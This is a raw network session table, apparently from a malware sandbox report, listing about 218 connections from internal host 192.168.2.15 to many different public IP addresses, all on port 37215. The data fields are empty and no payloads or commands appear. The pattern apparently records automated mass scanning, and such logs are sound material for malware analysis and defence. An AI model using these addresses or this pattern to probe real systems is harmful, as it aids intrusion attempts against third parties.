                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10751192.168.2.1557092222.118.69.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10752192.168.2.1532838121.165.17.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10753192.168.2.154916894.222.206.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10754192.168.2.1558342190.228.201.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10755192.168.2.1539902156.206.70.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10756192.168.2.1551222181.114.50.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10757192.168.2.1557152121.231.1.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10758192.168.2.1533574138.17.23.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10759192.168.2.1544738121.47.236.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10760192.168.2.155728637.126.235.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10761192.168.2.1550848157.189.38.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10762192.168.2.1541200222.186.166.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10763192.168.2.1557588222.198.161.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10764192.168.2.1534228121.245.161.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10765192.168.2.1548346121.237.219.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10766192.168.2.1541938190.75.47.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10767192.168.2.1535796156.52.165.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10768192.168.2.156022831.80.99.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10769192.168.2.1558414138.25.133.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10770192.168.2.1537662186.179.90.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10771192.168.2.153756837.233.120.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10772192.168.2.1557714132.3.113.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10773192.168.2.1535944102.242.225.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10774192.168.2.1557488156.160.192.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10775192.168.2.1533026122.109.170.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10776192.168.2.154959045.21.32.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10777192.168.2.1536842190.46.170.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10778192.168.2.1536130138.180.120.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10779192.168.2.155193837.102.248.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10780192.168.2.1550274186.213.132.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10781192.168.2.1545588121.202.2.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10782192.168.2.1548490190.47.158.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10783192.168.2.1539024181.239.68.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10784192.168.2.1543386222.250.148.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10785192.168.2.1549366190.74.251.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10786192.168.2.1555602138.225.92.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10787192.168.2.1547206122.95.123.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10788192.168.2.1535078190.23.20.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10789192.168.2.1538906156.243.36.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10790192.168.2.1557274122.145.195.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10791192.168.2.1541636157.40.199.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10792192.168.2.1552392138.127.139.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10793192.168.2.155804445.246.118.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10794192.168.2.1535052190.14.230.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10795192.168.2.1540976156.18.224.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10796192.168.2.1541228199.79.106.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10797192.168.2.154773031.110.254.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10798192.168.2.154363851.121.123.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10799192.168.2.1537974102.233.34.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10800192.168.2.155621245.250.125.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10801192.168.2.1547890121.89.57.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10802192.168.2.1546088156.37.122.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10803192.168.2.1559328156.19.182.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10804192.168.2.1545090190.215.199.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10805192.168.2.1543384222.42.148.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10806192.168.2.1539400156.45.121.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10807192.168.2.1544620102.205.207.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10808192.168.2.1533676122.53.249.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10809192.168.2.1533454181.33.110.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10810192.168.2.1547778222.122.135.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10811192.168.2.1533780102.20.202.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10812192.168.2.1542688190.196.168.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10813192.168.2.1546062122.232.227.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10814192.168.2.1549252197.30.39.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10815192.168.2.1545758222.245.56.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10816192.168.2.153359837.234.25.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10817192.168.2.153939431.99.206.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10818192.168.2.155867831.137.7.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10819192.168.2.1551584156.20.177.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10820192.168.2.1543370222.199.158.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10821192.168.2.153745494.48.202.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10822192.168.2.1554806222.25.77.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10823192.168.2.154848037.109.253.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10824192.168.2.1543324223.106.213.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10825192.168.2.1544822138.169.241.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10826192.168.2.1560126138.221.129.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10827192.168.2.1554888190.6.224.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10828192.168.2.1552508197.168.176.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10829192.168.2.1535118190.85.69.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10830192.168.2.1550830222.65.56.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10831192.168.2.1542660121.213.176.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10832192.168.2.1553326197.74.254.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10833192.168.2.154718837.144.115.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10834192.168.2.1550918138.123.34.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10835192.168.2.1541614138.122.20.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10836192.168.2.153844631.6.59.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10837192.168.2.1552046181.185.222.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10838192.168.2.154766294.213.243.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10839192.168.2.1557870190.155.46.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10840192.168.2.153615431.96.26.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10841192.168.2.155699231.204.248.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10842192.168.2.1560556156.210.232.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10843192.168.2.1535872156.248.1.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10844192.168.2.1553070222.158.174.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10845192.168.2.1557314190.155.250.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10846192.168.2.155617845.208.198.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10847192.168.2.153367437.103.99.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10848192.168.2.1539550121.228.133.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10849192.168.2.155467831.136.255.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10850192.168.2.1534380197.82.8.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10851192.168.2.1559536222.216.134.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10852192.168.2.1553390138.100.86.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10853192.168.2.1553858102.15.218.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10854192.168.2.1556060186.118.80.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10855192.168.2.1533336222.118.102.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10856192.168.2.1543370197.243.142.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10857192.168.2.1560400197.83.169.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10858192.168.2.1540166190.174.72.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10859192.168.2.154934641.167.45.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10860192.168.2.1542306156.78.2.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10861192.168.2.1538946138.168.217.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10862192.168.2.155550841.23.162.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10863192.168.2.1533456138.64.243.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10864192.168.2.155544841.92.219.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10865192.168.2.1548448156.49.241.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10866192.168.2.1533652122.97.31.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10867192.168.2.153602294.182.9.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10868192.168.2.1550874186.183.165.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10869192.168.2.1557182181.219.164.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10870192.168.2.1545180156.48.63.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10871192.168.2.154987231.54.190.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10872192.168.2.1534690157.109.251.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10873192.168.2.154508237.233.97.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10874192.168.2.1550204156.248.71.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10875192.168.2.1542026121.180.254.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10876192.168.2.1545718181.144.99.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10877192.168.2.153730837.80.155.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10878192.168.2.1560834138.210.99.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10879192.168.2.1545100121.79.243.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10880192.168.2.1547806186.39.112.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10881192.168.2.1533446138.147.119.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10882192.168.2.1556864102.55.228.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10883192.168.2.1556878156.62.0.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10884192.168.2.1554708138.42.231.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10885192.168.2.1550348102.8.150.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10886192.168.2.1538854122.51.159.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10887192.168.2.153650245.177.216.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10888192.168.2.1537474156.144.187.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10889192.168.2.1555084190.156.2.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10890192.168.2.1547366122.180.181.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10891192.168.2.1541044122.139.65.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10892192.168.2.1546088102.162.29.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10893192.168.2.155008894.179.21.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10894192.168.2.1556482201.153.6.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10895192.168.2.155951841.225.179.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10896192.168.2.1551386157.195.253.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10897192.168.2.1549996102.165.248.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10898192.168.2.154574441.23.150.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10899192.168.2.1553580102.210.244.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10900192.168.2.1555506197.21.179.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10901192.168.2.1534276156.21.159.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10902192.168.2.1543574190.174.254.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10903192.168.2.1535910209.121.54.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10904192.168.2.1550588197.153.45.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10905192.168.2.1553886156.234.213.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10906192.168.2.1555318190.40.41.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10907192.168.2.1558172186.183.97.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10908192.168.2.153837045.170.253.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10909192.168.2.154475045.111.217.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10910192.168.2.153381041.171.85.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10911192.168.2.1555734138.2.193.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10912192.168.2.1535200222.203.237.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10913192.168.2.154685245.123.102.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10914192.168.2.1547210138.218.30.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10915192.168.2.1533478122.228.157.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10916192.168.2.1556926190.12.5.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10917192.168.2.1557862186.86.204.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10918192.168.2.1544322157.63.43.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10919192.168.2.155360837.67.79.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10920192.168.2.1543408222.42.16.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10921192.168.2.1554512186.4.164.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10922192.168.2.1559800190.90.203.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10923192.168.2.1555542181.8.162.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10924192.168.2.1536028138.99.92.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10925192.168.2.1545634157.88.99.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10926192.168.2.153310094.211.135.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10927192.168.2.1558920197.94.50.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10928192.168.2.1549880138.178.43.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10929192.168.2.154253241.64.226.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10930192.168.2.1558588125.1.199.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10931192.168.2.1559226190.245.1.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10932192.168.2.153659894.180.77.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10933192.168.2.1532902156.16.186.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10934192.168.2.1554698197.213.130.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10935192.168.2.1538466102.193.211.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10936192.168.2.1555738186.187.111.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10937192.168.2.1550028222.116.96.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10938192.168.2.1550896197.165.169.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10939192.168.2.1555390222.168.62.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10940192.168.2.153693045.141.175.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10941192.168.2.155230631.166.9.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10942192.168.2.1555136181.200.136.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10943192.168.2.1554162102.209.122.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10944192.168.2.154589031.21.167.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10945192.168.2.1554988138.98.231.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10946192.168.2.153775045.172.86.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10947192.168.2.154639045.38.252.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10948192.168.2.153958245.164.5.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10949192.168.2.1555574122.23.153.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10950192.168.2.153598645.96.175.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10951192.168.2.1545036122.69.187.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10952192.168.2.154519631.4.7.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10953192.168.2.155112445.206.89.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10954192.168.2.1551142190.160.53.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10955192.168.2.1539978157.159.107.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10956192.168.2.1538774102.103.51.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10957192.168.2.1537196156.241.146.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10958192.168.2.155801041.165.227.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10959192.168.2.1539222190.9.63.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10960192.168.2.1558632138.68.236.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10961192.168.2.1541138222.167.73.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10962192.168.2.153691231.255.249.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10963192.168.2.1546530190.93.9.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10964192.168.2.1540594157.26.236.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10965192.168.2.155724845.164.78.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10966192.168.2.1556864138.244.179.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10967192.168.2.1539992156.192.82.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10968192.168.2.1535436197.20.98.4337215
                                              TimestampBytes transferredDirectionData


